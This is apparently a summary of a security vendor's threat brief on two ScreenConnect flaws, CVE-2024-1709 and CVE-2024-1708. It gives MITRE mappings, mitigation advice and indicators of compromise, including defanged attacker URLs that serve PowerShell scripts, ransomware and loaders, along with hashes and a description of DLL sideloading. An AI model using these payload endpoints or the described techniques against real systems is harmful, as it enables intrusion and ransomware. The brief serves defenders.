Keypoints
- Two vulnerabilities affect ConnectWise ScreenConnect 23.9.7 and prior: CVE-2024-1709 (authentication bypass, critical) and CVE-2024-1708 (path traversal, high).
- CVE-2024-1709 is trivially exploitable; proof-of-concept exploits and a Metasploit unauthenticated RCE module are publicly available.
- Unit 42 observed 18,188 unique IPs hosting ScreenConnect globally, with concentrated exposure in the United States.
- Threat actors have distributed malicious installers and payloads (ransomware, stealers, Cobalt Strike), using URLs and sideloading techniques to deliver loaders and DLLs.
- ConnectWise patched cloud-hosted instances and released guidance to patch self-hosted/on-prem systems; license restrictions were lifted to allow upgrades of older versions.
- Palo Alto Networks published protections (Threat Prevention signature 95048, URL/DNS categorization, Cortex XDR/XSIAM rules, and Cortex Xpanse attack surface rules) and Unit 42 is providing incident response support.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploitation of ScreenConnect vulnerabilities allowing remote code execution (“…path-traversal vulnerability, which may allow an attacker the ability to execute remote code…”)
- [T1556] Modify Authentication Process – Authentication bypass via alternate path/channel (“…authentication bypass using an alternate path or channel vulnerability…”)
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – Adversaries use legitimate binaries to load malicious DLLs (“…Malicious DLL Component (Loader)”; “Clean File used for sideloading malicious DLL”)
- [T1059.001] Command and Scripting Interpreter: PowerShell – Use of PowerShell scripts to decode and deploy malware (“…all.ps1 – Malicious Script downloads payload…”; “Decoded PowerShell script”)
- [T1105] Ingress Tool Transfer – Downloading payloads and installers from remote URLs (“…hxxp://185.232.92.32:8888/all.ps1”; “hxxps://transfer.sh/get/6YoVhBPfKE/temp2.exe”)
- [T1071.001] Application Layer Protocol: Web Protocols – Use of HTTP(S) endpoints for payload delivery and C2 (“…hxxp://159.65.130.146:4444/svchost.exe”; multiple hxxp:// URLs listed)
- [T1486] Data Encrypted for Impact – Deployment of ransomware executables observed (“…”enc.exe” ransomware executable”; “crypt64ult.exe ransomware executable”)
Indicators of Compromise
- [IP Address] ScreenConnect hosts and actor infrastructure – 155.133.5.15, 155.133.5.14 (ConnectWise-identified), and 118.69.65.60
- [SHA256 hashes] Malicious binaries and scripts – 0d185ea3b0a49c2fa65bfd2757c9d0705657f0639fd36f196ac394fcd38c361d, 19fc383683b34ba31ed055dc2e546a64eecbe06d79b6cc346773478c84f25f92, and 19 more hashes
- [URLs] Payload and distribution endpoints used by actors – hxxp://185.232.92.32:8888/all.ps1, hxxps://transfer.sh/get/6YoVhBPfKE/temp2.exe, and other malicious URLs (e.g., hxxp://207.246.74.189:804/download/Diablo.log)
- [Filenames] Notable malicious filenames observed – “enc.exe” (ransomware), “UpdaterScreenConnect.exe” (malicious impostor), “SentinelAgentCore.dll” (malicious loader)
ConnectWise ScreenConnect versions up to 23.9.7 contain two critical flaws: CVE-2024-1709 (a trivial authentication bypass allowing unauthenticated access and RCE) and CVE-2024-1708 (a path-traversal vulnerability enabling remote code execution or data access). Proof-of-concept code and a Metasploit module for CVE-2024-1709 are public, and Unit 42 observed thousands of exposed ScreenConnect hosts, increasing the risk of rapid exploitation. Multiple malicious infrastructure indicators and payloads have been documented, including hosted scripts (all.ps1), DLL loaders (SentinelAgentCore.dll), ransomware binaries (enc.exe, crypt64ult.exe), and standalone installers distributed via transfer.sh and HTTP endpoints.
Observed attacker behavior follows a consistent technical pattern: exploit the public-facing ScreenConnect service to bypass authentication or traverse paths, then fetch and execute secondary payloads via HTTP(S) (PowerShell scripts, EXEs, and DLLs). Adversaries use DLL sideloading to run malicious loaders, deploy payloads such as Cobalt Strike beacons and ransomware, and host distribution files on attacker-controlled IPs and transfer services. IOCs include multiple IP addresses, numerous SHA256 hashes of payloads and loaders, and URLs used for delivery and staging; defenders should treat any matching indicators as high priority.
Mitigation guidance: immediate patching or upgrade of self-hosted ScreenConnect instances to fixed versions is required (cloud-hosted screenconnect.com and hostedrmm.com instances were updated by ConnectWise). Where patching is delayed, block known malicious IPs/URLs and apply detections for PowerShell download-and-execute activity, DLL side-loading, and exploit attempts against ScreenConnect. Palo Alto Networks customers can deploy Threat Prevention signature 95048, Advanced URL/DNS filtering, and Cortex XDR/XSIAM/Xpanse rules to detect and block related exploitation and post-exploitation activity; Unit 42 also offers incident response support for compromised environments.
Read more: https://unit42.paloaltonetworks.com/connectwise-threat-brief-cve-2024-1708-cve-2024-1709/